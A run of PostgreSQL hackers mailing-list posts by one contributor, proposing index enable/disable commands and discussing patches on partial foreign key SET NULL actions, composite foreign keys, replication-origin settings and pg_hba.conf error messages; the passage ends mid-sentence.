PROPOSAL: Support global and local disabling of indexes

2022-03-17 Thread Paul Martinez
Hey, hackers,

Adding and removing indexes is a regular part of database maintenance,
but in a large database, removing an index can be a very risky operation.
Removing the wrong index could have disastrous consequences for
performance, and it could take tens of minutes, or even hours, to rebuild
the entire index.

I propose adding an ALTER INDEX command that can enable or disable an
index on a global level:

ALTER INDEX index_name ENABLE;
ALTER INDEX index_name DISABLE;

A disabled index is still updated, and still enforces constraints, but it
will not be used for queries.
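
For example (a hedged sketch of the proposed semantics; table and index
names are illustrative):

CREATE UNIQUE INDEX users_email_idx ON users (email);
ALTER INDEX users_email_idx DISABLE;

INSERT INTO users (email) VALUES ('a@example.com');
INSERT INTO users (email) VALUES ('a@example.com');  -- still fails: duplicate key

EXPLAIN SELECT * FROM users WHERE email = 'a@example.com';
-- the disabled index is not considered, so the planner chooses a
-- sequential scan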

Whether or not the index is disabled could also be specified at index
creation:

CREATE INDEX index_name ON table_name (col1, col2) ENABLED; -- default
CREATE INDEX index_name ON table_name (col1, col2) DISABLED;

This would be useful if a user anticipates that index creation will take a
long time and they want to be able to carefully monitor the database once
the index starts getting used.

It would also be useful to be able to enable and disable indexes locally
in the context of a single session to easily and safely verify that a
query can still be executed efficiently without an index:

ALTER INDEX index_name DISABLE SESSION;
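
A hedged sketch of the intended workflow for safely testing index removal
(names are illustrative):

ALTER INDEX orders_customer_idx DISABLE SESSION;
EXPLAIN ANALYZE SELECT * FROM orders WHERE customer_id = 42;
-- if the plan and timing are acceptable without the index, it can be
-- dropped for real; otherwise simply re-enable it:
ALTER INDEX orders_customer_idx ENABLE SESSION;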

It might also be reasonable to "unset" any local override, reverting to
what's actually set on the index itself, but this would probably require
slightly different syntax: maybe SET ENABLED = true / false / DEFAULT?

I am unsure of how a user would query this information; maybe a function
like pg_disabled_index_overrides()? The permanent state of an index
should be reflected in the output of \d <table> by appending 'DISABLED'
to disabled indexes.


The pg_index catalog entry currently includes a column `indisvalid` which,
when false, prevents queries from using the index. This column can be set
explicitly, though not easily (it requires getting the oid of the index
relation from pg_class), and presumably not entirely safely. This column
contains significant semantic information about the state of the index, so
I don't think it makes sense to burden it with additional meaning that is
entirely user-dependent.
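
For reference, the existing workaround looks something like this (direct
catalog updates like this are unsupported and risky, which is exactly what
this proposal would replace):

UPDATE pg_index SET indisvalid = false
WHERE indexrelid = 'index_name'::regclass;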

Supporting global enabling/disabling of an index could be accomplished
fairly simply by adding a `indisenabled` boolean flag to pg_index.
Updating this value would acquire an AccessExclusive lock on the index and
call an updated version of index_set_state_flags, which automatically
handles sending the cache invalidation message to other processes.
(Is this sufficient to also invalidate all cached query plans?)

The actual "disabling" part can be handled by adding disable_cost inside
the cost_index function in costsize.c, similar to how enable_indexscan is
handled.
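
For comparison, this is the existing session-wide switch whose costing
mechanism the proposal would reuse on a per-index basis (reusing the
example names from above):

SET enable_indexscan = off;
SET enable_bitmapscan = off;
EXPLAIN SELECT * FROM table_name WHERE col1 = 0;
-- index paths are penalized by disable_cost, so the planner falls back
-- to a sequential scan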


Supporting session-local enabling/disabling of indexes is trickier. We can
keep track of the manual overrides in the backend process's local memory
as a very light-weight option. (A simple linked list would suffice.) But
we have to take extra care to keep this up-to-date. When an index is
dropped, any local overrides need to be dropped. It probably also makes
sense to mimic the behavior of SET SESSION, which will roll back any
changes made during a transaction if the transaction rolls back. (And if
we handle this, maybe it makes sense to support ENABLE / DISABLE LOCAL as
analogues of SET LOCAL as well.)

To handle persisting/rolling back changes we can add a new AtEOXact
function that gets called at the end of CommitTransaction and
AbortTransaction.

I'm less sure how to handle deleting entries when indexes are deleted by
other transactions (or especially by the same transaction). Could we use
CacheRegisterRelcacheCallback to be notified anytime the relcache is
updated and make sure all the indexes we have overrides for still exist?
When would that callback be executed relative to our own process? If the
backend isn't in a transaction, it would have to check for deleted indexes
right away, but if it is, we would have to wait for the end of the
transaction to update our list (possibly a job for
AtEOXact_UpdateDisabledIndexes?) Are there other parts of Postgres that
behave similarly?

A more heavy-weight option would be to actually store this info in a
catalog table, but that would add a lot of overhead to cost estimation
during query planning, so I don't think it's a great option.


Does this sound like a reasonable feature to add to Postgres? I feel like
it would make it a lot easier to manage large databases and debug some
query performance problems. There are definitely some details to iron out,
like the exact syntax, and a lot of implementation details I'm unsure of,
but if people support it I'd be glad to try to implement it.

Thanks!
Paul




Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-12-01 Thread Paul Martinez
On Wed, Nov 24, 2021 at 10:59 AM Peter Eisentraut wrote:
>
> I was looking through this example to see if it could be adapted for the
> documentation.
>
> The way the users table is defined, it appears that "id" is actually
> unique and the primary key ought to be just (id).  The DELETE command
> you show also just uses the id column to find the user, which would be
> bad if the user id is not unique across tenants.  If the id were unique,
> then the foreign key from posts to users would just use the user id
> column and the whole problem of the ON DELETE SET NULL action would go
> away.  If the primary key of users is indeed supposed to be (tenant_id,
> id), then maybe the definition of the users.id column should not use
> serial, and the DELETE command should also look at the tenant_id column.
> (The same question applies to posts.id.)
>
> Also, you initially wrote that this is a denormalized schema.  I think
> if we keep the keys the way you show, then this isn't denormalized.  But
> if we considered users.id globally unique, then there would be
> normalization concerns.
>
> What do you think?

Regarding that specific example, in a production scenario, yes, the
DELETE command should reference both columns. And if used for
documentation both columns should be referenced for clarity/correctness.

I don't think the exact semantics regarding the uniqueness of the id
column are critical. Configuring separate auto-incrementing ids per
tenant would be fairly complex; practically speaking, a single
database with multi-tenant data will use serial to get auto-incrementing
ids (or else use UUIDs to prevent conflicts). The possibility of
conflicting ids likely won't arise until moving to a distributed
environment, at which point queries should only be routed towards a
single shard (where uniqueness will still hold), either by some higher
level application-level context, or by including the tenant_id as part
of the query.

I think there are three separate motivating use cases for using
(tenant_id, id) as primary keys everywhere in a multi-tenant database:

1) I initially encountered this problem while migrating a database to use
Citus, which requires that primary keys (and any other uniqueness
constraints) include the shard key, which forces the primary key to be
(tenant_id, id). I'm not sure what constraints other sharding solutions
enforce, but I don't feel like this feature is over-fitting to Citus'
specific implementation -- it seems like a pretty
reasonable/generalizable solution when sharding data: prefix all your
indexes with the shard key.

2) As I mentioned in my response to Tom in my original proposal thread,
and as Matthias alluded to, using composite primary keys grants
significantly stronger referential integrity by preventing cross-tenant
references. I think this represents a significant leap in the robustness
and security of a schema, to the point where you could consider it a
design flaw to _not_ use composite keys.

https://www.postgresql.org/message-id/flat/CAF%2B2_SFFCjWMpxo0cj3yaqMavcb3Byd0bSG%2B0UPs7RVb8EF99g%40mail.gmail.com#c0e2b37b223bfbf8ece561f02865286c

3) For performance reasons, indexes on foreign keys will often be
prefixed by the tenant_id to speed up index scans. (I think
algorithmically doing an index lookup on (fk_id) vs. (tenant_id, fk_id)
has the same complexity, but repeated index scans, such as when doing a
join, should in practice be more efficient when including a tenant_id,
because most queries will only reference a single tenant so the looked
up values are more likely to be on the same pages.) If a foreign key
only references the id column, then ON DELETE CASCADE triggers will only
use the id column in their DELETE query. Thus, to ensure that deletes
are still fast, you will need to create an index on (fk_id) in addition
to the (tenant_id, fk_id) index, which would cause _significant_
database bloat. (In practice, the presence of both indexes will also
confuse the query planner and now BOTH indexes will take up precious
space in the database's working memory, so it really creates all sorts
of problems.) Using a composite foreign key ensures that the ON DELETE
CASCADE trigger's query uses both columns.
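
As a concrete sketch (illustrative names, continuing the multi-tenant
example): with a composite foreign key, one composite index serves the
cascade:

CREATE INDEX posts_author_idx ON posts (tenant_id, author_id);
-- the ON DELETE CASCADE trigger then effectively runs:
--   DELETE FROM posts WHERE tenant_id = $1 AND author_id = $2;
-- a single-column foreign key would instead run:
--   DELETE FROM posts WHERE author_id = $1;
-- which this index cannot serve efficiently, since author_id is not its
-- leading column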

- Paul




Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-11-22 Thread Paul Martinez
On Mon, Nov 22, 2021 at 10:21 PM Zhihong Yu  wrote:
>
> Hi,
> +   If a foreign key with a SET NULL or SET
> +   DEFAULT delete action, which columns should be updated.
>
> which columns should be updated -> the columns that should be updated

Done.

> +   if (fk_del_set_cols)
> +   {
> +   int num_delete_cols = 0;
>
> Since num_delete_cols is only used in the else block, I think it can be moved 
> inside else block.
> Or you can store the value inside *num_fk_del_set_cols directly and avoid 
> num_delete_cols.

I've moved it inside the else block (and removed the initialization).

Updated patch attached. Thanks for taking a look so quickly!

- Paul


referential-actions-on-delete-only-set-cols-v5.patch
Description: Binary data


Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-11-22 Thread Paul Martinez
On Thu, Nov 11, 2021 at 4:34 AM Peter Eisentraut wrote:
>
> I have reviewed your patch
> referential-actions-on-delete-only-set-cols-v3.patch.  Attached are two
> patches that go on top of yours that contain my recommended changes.
>
> Basically, this all looks pretty good to me.  My changes are mostly
> stylistic.

Thank you! I really, really appreciate the thorough review and the
comments and corrections.

> Some notes of substance:
>
> - The omission of the referential actions details from the CREATE TABLE
> reference page surprised me.  I have committed that separately (without
> the column support, of course).  So you should rebase your patch on top
> of that.  Note that ALTER TABLE would now also need to be updated by
> your patch.

Done.

> - I recommend setting pg_constraint.confdelsetcols to null for the
> default behavior of setting all columns, instead of an empty array the
> way you have done it.  I have noted the places in the code that need to
> be changed for that.

Done.

> - The outfuncs.c support shouldn't be included in the final patch.
> There is nothing wrong it, but I don't think it should be part of this
> patch to add piecemeal support like that.  I have included a few changes
> there anyway for completeness.

Got it. I've reverted the changes in that file.

> - In ri_triggers.c, I follow your renaming of the constants, but
> RI_PLAN_ONTRIGGER_RESTRICT seems a little weird.  Maybe do _ONBOTH_, or
> else reverse the order, like RI_PLAN_SETNULL_ONDELETE, which would then
> allow RI_PLAN_RESTRICT.

I've reversed the order, so it's now RI_PLAN_<action>_<event>, and
renamed the RESTRICT one to just RI_PLAN_RESTRICT.


I've attached an updated patch, including your changes and the additional
changes mentioned above.

- Paul


referential-actions-on-delete-only-set-cols-v4.patch
Description: Binary data


Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-10-26 Thread Paul Martinez
On Thu, Sep 2, 2021 at 1:55 PM Zhihong Yu  wrote:
>
> Hi,
> +   case RI_TRIGTYPE_DELETE:
> +   queryno = is_set_null
> +   ? RI_PLAN_ONDELETE_SETNULL_DOUPDATE
> +   : RI_PLAN_ONDELETE_SETDEFAULT_DOUPDATE;
>
> Should the new symbols be renamed ?
>
> RI_PLAN_ONDELETE_SETNULL_DOUPDATE -> RI_PLAN_ONDELETE_SETNULL_DODELETE
> RI_PLAN_ONDELETE_SETDEFAULT_DOUPDATE -> RI_PLAN_ONDELETE_SETDEFAULT_DODELETE

These constants are named correctly -- they follow the format:

RI_PLAN_<trigger event>_<action>_<query type>

These symbols refer to plans that are used for ON DELETE SET NULL
and ON DELETE SET DEFAULT triggers, which update rows in the referencing
table ("_DOUPDATE"). These triggers do not perform any deletions.


But these names are definitely confusing, and I did have to spend some time
confirming that the names were correct. I decided to rename these, as well as
the other plan keys, so they all use the same more explicit format:

RI_PLAN_<trigger event>_<action>

RI_PLAN_CASCADE_DEL_DODELETE => RI_PLAN_ONDELETE_CASCADE
RI_PLAN_CASCADE_UPD_DOUPDATE => RI_PLAN_ONUPDATE_CASCADE

RI_PLAN_RESTRICT_CHECKREF    => RI_PLAN_ONTRIGGER_RESTRICT

RI_PLAN_SETNULL_DOUPDATE     => RI_PLAN_ONDELETE_SETNULL
                                and RI_PLAN_ONUPDATE_SETNULL

RI_PLAN_SETDEFAULT_DOUPDATE  => RI_PLAN_ONDELETE_SETDEFAULT
                                and RI_PLAN_ONUPDATE_SETDEFAULT

The same plan can be used for both ON DELETE RESTRICT and ON UPDATE RESTRICT,
so we just use ONTRIGGER there. Previously, the same plan could also be
used for both ON DELETE SET NULL and ON UPDATE SET NULL, or both
ON DELETE SET DEFAULT and ON UPDATE SET DEFAULT. This is no longer the case,
so we need to add separate keys for each case. As an example, a constraint on
a table foo could specify:

FOREIGN KEY (a, b) REFERENCES bar (a, b)
  ON UPDATE SET NULL
  ON DELETE SET NULL (a)

In this case for the update trigger we want to do:

UPDATE foo SET a = NULL, b = NULL WHERE ...

but for the delete trigger we want to do:

UPDATE foo SET a = NULL WHERE ...

so the plans cannot be shared.

(Note that we still need separate plans even if we only support specifying
a column subset for the ON DELETE trigger. As in the above example, the
ON UPDATE trigger will always set all the columns, while the ON DELETE trigger
could only set a subset.)


- Paul


referential-actions-set-cols-v4.patch
Description: Binary data


referential-actions-on-delete-only-set-cols-v3.patch
Description: Binary data


Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-09-02 Thread Paul Martinez
On Wed, Sep 1, 2021 at 4:11 AM Daniel Gustafsson  wrote:

> This patch no longer applies, can you please submit a rebased version?  It
> currently fails on catversion.h, to keep that from happening repeatedly you
> can IMO skip that from the patch submission.

Ah, understood. Will do that in the future. Attached are rebased patches, not
including catversion.h changes, for both the ON UPDATE/DELETE case, and the
ON DELETE only case.

- Paul


referential-actions-set-cols-v3.patch
Description: Binary data


referential-actions-on-delete-only-set-cols-v2.patch
Description: Binary data


Re: Allow composite foreign keys to reference a superset of unique constraint columns?

2021-08-17 Thread Paul Martinez
On Tue, Aug 17, 2021 at 8:41 AM Jack Christensen  wrote:
>
> The only way to ensure a user can only be a member of a group in the same
> tenant is to make user_group_memberships.tenant_id part of the foreign key. And
> that will only work with a unique key on id and tenant_id in both users and
> user_groups. It's a bit inelegant to create multiple extra indexes to ensure
> consistency when existing indexes are enough to ensure uniqueness.
>
> Jack

You could accomplish this by using composite primary keys on the users and
user_groups tables:

CREATE TABLE users (
  id serial,
  tenant_id int REFERENCES tenants(id),
  PRIMARY KEY (tenant_id, id)
);

This approach works pretty well for multi-tenant databases, because then your
indexes all start with tenant_id, which should help with performance, and, in
theory, would make your database easier to shard. But then it requires
including a tenant_id in *every* query (and subquery!), which may be difficult
to enforce in a codebase.

One downside of the composite primary/foreign key approach is that ON DELETE
SET NULL foreign keys no longer work properly because they try to set both
columns to NULL, the true foreign key id, AND the shared tenant_id that is part
of the referencing table's primary key. I have a patch [1] out to add new
functionality to solve this problem though.

- Paul

[1]: 
https://www.postgresql.org/message-id/flat/CACqFVBZQyMYJV%3DnjbSMxf%2BrbDHpx%3DW%3DB7AEaMKn8dWn9OZJY7w%40mail.gmail.com




Allow composite foreign keys to reference a superset of unique constraint columns?

2021-08-16 Thread Paul Martinez
Hey, hackers!

While working with some foreign keys, I noticed some mildly unexpected
behavior. The columns referenced by a foreign key must naturally have a
unique constraint on them:

CREATE TABLE foo (a integer);
CREATE TABLE bar (x integer REFERENCES foo(a));
> ERROR:  there is no unique constraint matching given keys for referenced
  table "foo"

But Postgres doesn't allow a foreign key to reference a set of columns
without a unique constraint, even if there is a unique constraint on a
subset of those columns (i.e., it doesn't allow referencing a superset
of a unique constraint).

CREATE TABLE foo (a integer PRIMARY KEY, b integer);
CREATE TABLE bar (x integer, y integer, FOREIGN KEY (x, y) REFERENCES
foo(a, b));
> ERROR:  there is no unique constraint matching given keys for referenced
  table "foo"

It seems to me like there would be nothing wrong with allowing this foreign
key constraint to exist in this case. Because there is a unique constraint on
foo(a), foo(a, b) will also be unique. And it doesn't seem like it would be
too complex to implement.

Neither MATCH SIMPLE nor MATCH FULL constraints would have any issues
with this. MATCH PARTIAL may, but, alas, it's not implemented. (I've had
a few ideas about foreign keys, and MATCH PARTIAL seems to always come
up, and I still don't understand what its use case is.)




A real-world use case that uses denormalization could run into this. Imagine a
naive music database that has a list of artists, albums, and songs, where each
album is by one artist and each song is on one album, but we still store a
reference to the artist on each song:

CREATE TABLE artists (id serial PRIMARY KEY, name text);
CREATE TABLE albums (
  id serial PRIMARY KEY,
  artist_id integer REFERENCES artists(id),
  name text
);
CREATE TABLE songs (
  id serial PRIMARY KEY,
  artist_id integer REFERENCES artists(id) ON DELETE CASCADE,
  album_id integer REFERENCES albums(id) ON DELETE CASCADE,
  name text
);

To ensure that artist deletions are fast, we need to create an index on
songs(artist_id) and songs(album_id). But, suppose we wanted to save on index
space, and we never needed to query JUST by album_id. We could then do:

CREATE TABLE songs (
  id serial PRIMARY KEY,
  artist_id integer REFERENCES artists(id) ON DELETE CASCADE,
  album_id integer,
  name text,
  FOREIGN KEY (artist_id, album_id) REFERENCES albums (artist_id, id)
    ON DELETE CASCADE
);

And then we could have a single index on songs(artist_id, album_id) that would
serve both ON DELETE CASCADE triggers:

-- Delete artist
DELETE FROM songs WHERE artist_id = <artist_id>;
-- Delete album
DELETE FROM songs
  WHERE artist_id = <artist_id> AND album_id = <album_id>;

But Postgres wouldn't let us create the composite foreign key described.



It seems like a somewhat useful feature. If people think it would be useful to
implement, I might take a stab at it when I have time.

- Paul




Re: [PATCH] Partial foreign key updates in referential integrity triggers

2021-08-04 Thread Paul Martinez
On Wed, Jul 14, 2021 at 6:51 AM Peter Eisentraut wrote:
> I think this is an interesting feature with a legitimate use case.

Great! I'm glad to hear that.

> Consider what should happen when you update users.id.  Per SQL standard,
> for MATCH SIMPLE an ON UPDATE SET NULL should only set to null the
> referencing column that corresponds to the referenced column actually
> updated, not all of them.  PostgreSQL doesn't do this, but if it did,
> then this would work just fine.
>
> ...
>
> So, unless I'm missing an angle here, I would suggest leaving out the ON
> UPDATE variant of this feature.

I understand what you're saying here, but are you sure that is the
behavior specified in the SQL standard?

I can't find a copy of a more recent standard, but at least in SQL 1999 [1],
it has this to say (page 459 of the linked PDF, page 433 of the standard):

> 8) If a non-null value of a referenced column in the referenced table is
>updated to a value that is distinct from the current value of that
>column, then for every member F of the subtable family of the
>referencing table:
>
>   Case:
>   a) If SIMPLE is specified or implicit, or if FULL is specified, then
>
> Case:
> ii) If the  specifies SET NULL, then
>
>   Case:
>   1) If SIMPLE is specified or implicit, then:
>
> A) 
>
> B) For every F, in every matching row in F, each referencing
> column in F that corresponds with a referenced column is set to
> the null value.

This phrasing doesn't seem to make any reference to which columns were
actually updated.

The definitions a few pages earlier do explicitly define the set of
updated columns ("Let UMC be the set of referencing columns that
correspond with updated referenced columns"), but that defined set is
only referenced in the behavior when PARTIAL is specified, implying that
the set of updated columns is _not_ relevant in the SIMPLE case.


If my understanding of this is correct, then Postgres _isn't_ out of spec,
and this extension still works fine for the ON UPDATE triggers. (But, wow,
this spec is not easy to read, so I could definitely be wrong.)

I'm not sure how MATCH PARTIAL fits into this; I know it's
unimplemented, but I don't know what its use cases are, and I don't
think I understand how ON DELETE / ON UPDATE should work with MATCH
PARTIAL, let alone how they would work combined with this extension.

This lack of clarity may be a good-enough reason to leave out the ON
UPDATE case.

On Wed, Jul 14, 2021 at 12:36 PM Ibrar Ahmed  wrote:
> Patch does not apply on head, I am marking the status "Waiting on author"
> http://cfbot.cputube.org/patch_33_2932.log

I've rebased my original patch and it should work now. This is
referential-actions-set-cols-v2.patch.

I've also created a second patch that leaves out the ON UPDATE behavior, if
we think that's the safer route. This is
referential-actions-on-delete-only-set-cols-v1.patch.

[1]: http://web.cecs.pdx.edu/~len/sql1999.pdf


Re: [PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-26 Thread Paul Martinez
On Fri, Feb 26, 2021 at 5:22 AM Amit Kapila  wrote:
>
> https://www.postgresql.org/docs/devel/logical-replication-config.html
>

Ah, yep. I added a clause to the end of the sentence to clarify why we're
using max_replication_slots here:

- The subscriber also requires the max_replication_slots to be set.

+ The subscriber also requires that max_replication_slots be set to
+ configure how many replication origins can be tracked.

>
> Okay, that makes sense. However, I have sent a patch today (see [1])
> where I have slightly updated the subscriber-side configuration
> paragraph. From PG-14 onwards, table synchronization workers also use
> origins on subscribers, so you might want to adjust.
>
> ...
>
> I guess we can leave adding GUC to some other day as that might
> require a bit broader acceptance and we are already near to the start
> of last CF. I think we can still consider it if we few more people
> share the same opinion as yours.
>

Great. I'll wait to update the GUC patch until your patch and/or my
doc-only patch get merged. Should I add it to the March CF?

Separate question: are documentation updates like these ever backported
to older versions that are still supported? And if so, would the changes
be reflected immediately, or would they require a minor point release?
When I was on an older release I found that I'd jump back and forth
between the version I was using and the latest version to see if
anything had changed.


- Paul


max_replication_slots_subscriber_doc_v01.diff
Description: Binary data


Re: [PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-26 Thread Paul Martinez
On Thu, Feb 25, 2021 at 5:31 AM Amit Kapila  wrote:
>
> For docs only patch, I have few suggestions:
> 1. On page [1], it is not very clear that we are suggesting to set
> max_replication_slots for origins whereas your new doc patch has
> clarified it, can we update the other page as well.

Sorry, what other page are you referring to?


> 2.
> Setting it a lower value than the current
> + number of tracked replication origins (reflected in
> + <link linkend="view-pg-replication-origin-status">pg_replication_origin_status</link>,
> + not <link linkend="catalog-pg-replication-origin">pg_replication_origin</link>)
> + will prevent the server from starting.
> +
>
> Why can't we just mention pg_replication_origin above?
>

So this is slightly confusing:

pg_replication_origin just contains mappings from origin names to oids.
It is a regular catalog table and has no limit on its size. Users can also
manually insert rows into this table.

https://www.postgresql.org/docs/13/catalog-pg-replication-origin.html

The view showing the in-memory information is actually
pg_replication_origin_status. The number of entries here is what is
actually constrained by the GUC parameter.

https://www.postgresql.org/docs/13/view-pg-replication-origin-status.html
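
The distinction shows up directly in SQL: the catalog table is unbounded,
while the view reflects the fixed-size in-memory state sized by the GUC:

SELECT count(*) FROM pg_replication_origin;         -- name/OID mappings (catalog)
SELECT count(*) FROM pg_replication_origin_status;  -- tracked origins (in-memory)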

I clarified by pointing to pg_replication_origin_status because it could in
theory be out of sync with pg_replication_origin. I'm actually not sure
how entries there are managed. Perhaps if you were replicating from one
database and then stopped and started replicating from another database
you'd have two replication origins, but only one replication origin
status?


This also brings up a point regarding the naming of the added GUC.
max_replication_origins is cleanest, but has this confusion regarding
pg_replication_origin vs. pg_replication_origin_status.
max_replication_origin_statuses is weird (and long).
max_tracked_replication_origins is a possibility?

(One last bit of naming confusion; the internal code refers to them as
ReplicationStates, rather than ReplicationOrigins or
ReplicationOriginStatuses, or something like that.)


- Paul




Re: [PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-24 Thread Paul Martinez
Hey, all,

I went ahead and made a patch for introducing a new GUC variable,
max_replication_origins, to replace the awkward re-use of
max_replication_slots.

I'm mostly indifferent whether a new GUC variable is necessary, or
simply just updating the existing documentation (the first patch I
sent) is sufficient, but one of them should definitely be done to
clear up the confusion.

- Paul

On Tue, Feb 16, 2021 at 1:03 PM Paul Martinez  wrote:

> Hey, all,
>
> The configuration parameter max_replication_slots is most notably used
> to control how many replication slots can be created on a server, but it
> also controls how many replication origins can be tracked on the
> subscriber side.
>
> This is noted in the Configuration Settings section in the Logical
> Replication Chapter [1], but it is not mentioned in the documentation
> the parameter itself [2].
>
> The attached patch adds an extra paragraph explaining its effect on
> subscribers.
>
>
> Using max_replication_slots for sizing the number of available
> replication origin states is a little odd, and is actually noted twice
> in the source code [3] [4]:
>
> > XXX: Should we use a separate variable to size this rather than
> > max_replication_slots?
>
> > XXX: max_replication_slots is arguably the wrong thing to use, as here
> > we keep the replay state of *remote* transactions. But for now it
> > seems sufficient to reuse it, rather than introduce a separate GUC.
>
> This is a different usage of max_replication_slots than originally
> intended, managing resource usage on the subscriber side, rather than
> the provider side. This manifests itself in the awkwardness of the
> documentation, where max_replication_slots is only listed in the Sending
> Server section, and not mentioned in the Subscribers section.
>
> Given this, I think introducing a new parameter would make sense
> (max_replication_origins? slightly confusing because there's no limit on
> the number of records in pg_replication_origin; tracking of replication
> origins is displayed in pg_replication_origin_status).
>
> I'd be happy to make a patch for a new GUC parameter, if people think
> it's worth it to separate the functionality. Until then, however, the
> addition to the documentation should help prevent confusion.
>
>
> - Paul
>
> [1]: https://www.postgresql.org/docs/13/logical-replication-config.html
> [2]:
> https://www.postgresql.org/docs/13/runtime-config-replication.html#GUC-MAX-REPLICATION-SLOTS
> [3]:
> https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l162
> [4]:
> https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l495
>


max_replication_origins_v00.diff
Description: Binary data


[PATCH] Note effect of max_replication_slots on subscriber side in documentation.

2021-02-16 Thread Paul Martinez
Hey, all,

The configuration parameter max_replication_slots is most notably used
to control how many replication slots can be created on a server, but it
also controls how many replication origins can be tracked on the
subscriber side.

This is noted in the Configuration Settings section in the Logical
Replication Chapter [1], but it is not mentioned in the documentation
the parameter itself [2].

The attached patch adds an extra paragraph explaining its effect on
subscribers.


Using max_replication_slots for sizing the number of available
replication origin states is a little odd, and is actually noted twice
in the source code [3] [4]:

> XXX: Should we use a separate variable to size this rather than
> max_replication_slots?

> XXX: max_replication_slots is arguably the wrong thing to use, as here
> we keep the replay state of *remote* transactions. But for now it
> seems sufficient to reuse it, rather than introduce a separate GUC.

This is a different usage of max_replication_slots than originally
intended, managing resource usage on the subscriber side, rather than
the provider side. This manifests itself in the awkwardness of the
documentation, where max_replication_slots is only listed in the Sending
Server section, and not mentioned in the Subscribers section.

Given this, I think introducing a new parameter would make sense
(max_replication_origins? slightly confusing because there's no limit on
the number of records in pg_replication_origin; tracking of replication
origins is displayed in pg_replication_origin_status).

I'd be happy to make a patch for a new GUC parameter, if people think
it's worth it to separate the functionality. Until then, however, the
addition to the documentation should help prevent confusion.


- Paul

[1]: https://www.postgresql.org/docs/13/logical-replication-config.html
[2]: 
https://www.postgresql.org/docs/13/runtime-config-replication.html#GUC-MAX-REPLICATION-SLOTS
[3]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l162
[4]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/replication/logical/origin.c;h=685eaa6134e7cad193b583ff28284d877a6d8055;hb=HEAD#l495


max_replication_slots_subscriber_doc_v00.diff
Description: Binary data


Re: [PATCH] pg_hba.conf error messages for logical replication connections

2021-02-16 Thread Paul Martinez
On Tue, Feb 16, 2021 at 2:22 AM Amit Kapila  wrote:
>
> I don't think we need to update the error messages, it makes the code
> a bit difficult to parse without much benefit. How about just adding
> errdetail? See attached and let me know what you think?
>

Yeah, I think that looks good. Thanks!

- Paul




Re: [PATCH] pg_hba.conf error messages for logical replication connections

2021-02-01 Thread Paul Martinez
On Fri, Jan 29, 2021 at 8:41 PM Amit Kapila  wrote:
>
> Yeah, hints or more details might improve the situation but I am not
> sure we want to add more branching here. Can we write something
> similar to HOSTNAME_LOOKUP_DETAIL for hints? Also, I think what you
> are proposing to write is more of a errdetail kind of message. See
> more error routines in the docs [1].
>

Alright, I've updated both sets of error messages to use something like
HOSTNAME_LOOKUP_DETAIL, both for the error message itself, and for the
extra detail message about the replication keyword. Since now we specify
both an errdetail (sent to the client) and an errdetail_log (sent to the
log), I renamed HOSTNAME_LOOKUP_DETAIL to HOSTNAME_LOOKUP_DETAIL_LOG.

- Paul


pg_hba_conf_error_message_patch_v01.diff
Description: Binary data


Re: [PATCH] pg_hba.conf error messages for logical replication connections

2021-01-30 Thread Paul Martinez
On Thu, Jan 28, 2021 at 8:17 PM Amit Kapila  wrote:
>
> What exactly are you bothered about here? Is the database name not
> present in the message your concern or the message uses 'replication'
> but actually it doesn't relate to 'replication' specified in
> pg_hba.conf your concern? I think with the current scheme one might
> say that replication word in error message helps them to distinguish
> logical replication connection error from a regular connection error.
> I am not telling what you are proposing is wrong but just that the
> current scheme of things might be helpful to some users. If you can
> explain a bit how the current message misled you and the proposed one
> solves that confusion that would be better?
>

My main confusion arose from conflating the word "replication" in the
error message with the "replication" keyword in pg_hba.conf.

In my case, I was actually confused because I was creating logical
replication connections that weren't getting rejected, despite a lack
of any "replication" rules in my pg_hba.conf. I had the faulty
assumption that a replication connection requires the "replication" keyword,
and my change to the documentation makes it explicit that logical
replication connections do not match the "replication" keyword.

I was digging through the code trying to understand why it was working,
and also making manual connections before I stumbled upon these error
messages.

The fact that the error message doesn't include the database name
definitely contributed to my confusion. It only mentions the word
"replication", and not a database name, and that reinforces the idea
that the "replication" keyword rule should apply, because it seems
"replication" has replaced the database name.

But overall, I would agree that the current messages aren't wrong,
and my fix could still cause confusion because now logical replication
connections won't be described as "replication" connections.

How about explicitly specifying physical vs. logical replication in the
error message, and also adding hints for clarifying the use of
the "replication" keyword in pg_hba.conf?

if physical replication
  Error "pg_hba.conf rejects physical replication connection ..."
  Hint "Physical replication connections only match pg_hba.conf rules
using the "replication" keyword"
else if logical replication
  Error "pg_hba.conf rejects logical replication connection to database %s ..."
  // Maybe add this?
  Hint "Logical replication connections do not match pg_hba.conf rules
using the "replication" keyword"
else
  Error "pg_hba.conf rejects connection to database %s ..."

If I did go with this approach, would it be better to have three
separate branches, or to just introduce another variable for the
connection type? I'm not sure what is optimal for translation. (If both
types of replication connections get hints then probably three branches
is better.)

const char *connection_type;

connection_type =
  am_db_walsender ? _("logical replication connection") :
  am_walsender ? _("physical replication connection") :
  _("connection")


- Paul




[PATCH] pg_hba.conf error messages for logical replication connections

2021-01-28 Thread Paul Martinez
Hey, all,

When creating a logical replication connection that isn't allowed by the
current pg_hba.conf, the error message states that a "replication
connection" is not allowed.

This error message is confusing because although the user is trying to
create a replication connection and specified "replication=database" in
the connection string, the special "replication" pg_hba.conf keyword
does not apply. I believe the error message should just refer to a
regular connection and specify the database the user is trying to
connect to.

When connecting using "replication" in a connection string, the variable
am_walsender is set to true. When "replication=database" is specified,
the variable am_db_walsender is also set to true [1].

When checking whether a pg_hba.conf rule matches in libpq/hba.c, we only
check for the "replication" keyword when am_walsender && !am_db_walsender [2].

But then when reporting error messages in libpq/auth.c, only
am_walsender is used in the condition that chooses whether to specify
